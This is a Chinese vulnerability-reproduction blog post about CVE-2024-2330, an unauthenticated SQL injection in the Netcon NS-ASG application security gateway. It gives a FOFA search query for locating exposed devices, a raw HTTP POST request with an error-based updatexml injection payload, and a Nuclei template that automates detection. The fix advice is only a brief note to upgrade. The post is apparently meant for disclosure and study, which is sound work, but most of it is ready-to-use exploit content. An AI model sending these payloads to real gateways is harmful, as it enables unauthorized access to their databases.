当前位置：首页 > news >正文

【漏洞复现】网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330)

news 2025/12/22 4:38:34

免责声明：文章来源互联网收集整理，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

网康科技的NS-ASG应用安全网关是一款软硬件一体化的产品，集成了SSL和IPSec，旨在保障业务访问的安全性，适配所有移动终端，提供多种链路均衡和选择技术，支持多种认证方式灵活组合，以及内置短信认证、LDAP令牌、USB KEY等多达13种认证方式。

由于网康科技 NS-ASG 应用安全网关 /protocol/firewall/uploadmacbind.php文件没有对用户输入的参数进行严格的校验和过滤，导致输入的语句直接插入到数据库执行造成SQL注入，未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。

影响范围

NS-ASG 应用安全网关 v6.3

Ⅱ、fofa语句

app="网康科技-NS-ASG安全网关"

Ⅲ、漏洞复现

POC

POST /protocol/index.php HTTP/1.1
Host:127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0jsoncontent={"protocolType":"uploadmacbind","messagecontent":["1'and(updatexml(1,concat(0x7e,(select+version()),0x7e),1))='"]}

1、发送数据包，查询当前数据库版本

Ⅳ、Nuclei-POC

id: WangKang-NS-ASG-uploadmacbind-SQLinfo:name: 由于网康科技 NS-ASG 应用安全网关 /protocol/firewall/uploadmacbind.php文件没有对用户输入的参数进行严格的校验和过滤，导致输入的语句直接插入到数据库执行造成SQL注入，未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。author: WLFseverity: highmetadata: fofa-query: app="网康科技-NS-ASG安全网关"
variables:filename: "{{to_lower(rand_base(5))}}"boundary: "{{to_lower(rand_base(20))}}"
http:- raw:- |POST /protocol/index.php HTTP/1.1Host:{{Hostname}}Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 0jsoncontent={"protocolType":"uploadmacbind","messagecontent":["1'and(updatexml(1,concat(0x7e,(select+version()),0x7e),1))='"]}matchers:- type: dsldsl:- status_code==200 && contains_all(body,"nXPATH syntax error")

Ⅴ、修复建议

升级至安全版本

【漏洞复现】网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330)

Ⅰ、漏洞描述

Ⅱ、fofa语句

Ⅲ、漏洞复现

1、发送数据包，查询当前数据库版本

Ⅳ、Nuclei-POC

Ⅴ、修复建议

相关文章：

【漏洞复现】网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330)

2024年华为OD机试真题-查找众数及中位数-Java-OD统一考试（C卷）

力扣思路题：重复的子字符串

同城即配年度观察：顺丰同城率先全年盈利，行业破局迎参考

线上机器 swap 过高导致告警

案例分析篇13：系统分析与设计考点（2024年软考高级系统架构设计师冲刺知识点总结系列文章）

算法（结合算法图解）

Linux-多线程

深入解析C++树形关联式容器：map、set及其衍生容器的使用与原理

c++基础知识（一）

Midjourney绘图欣赏系列【人物篇】（一）

2024 年 2 月 NFT 行业动态：加密货币飙升，NFT 市场调整

【C++那些事儿】深入理解C++类与对象：从概念到实践（下）| 再谈构造函数（初始化列表）| explicit关键字 | static成员 | 友元

前端面试 ===＞【Vue2】

面试 Java 并发编程八股文十问十答第四期

物体检测-系列教程27：YOLOV5 源码解析17（训练脚本解读：训练函数4）

基于51单片机的数字时钟（万年历）设计与实现

2024年谷歌SEO的趋势预测及应对建议（川圣SEO）蜘蛛池

Rust 生命周期符号使用的方法和规律

生成哈夫曼树（100%用例）C卷(JavaPythonC++Node.jsC语言)

使用docker在3台服务器上搭建基于redis 6.x的一主两从三台均是哨兵模式

Python：操作 Excel 折叠

YSYX学习记录（八）

Objective-C常用命名规范总结

1688商品列表API与其他数据源的对接思路

ESP32读取DHT11温湿度数据

1.3 VSCode安装与环境配置

学习STC51单片机31（芯片为STC89C52RCRC）OLED显示屏1

数据链路层的主要功能是什么

【python异步多线程】异步多线程爬虫代码示例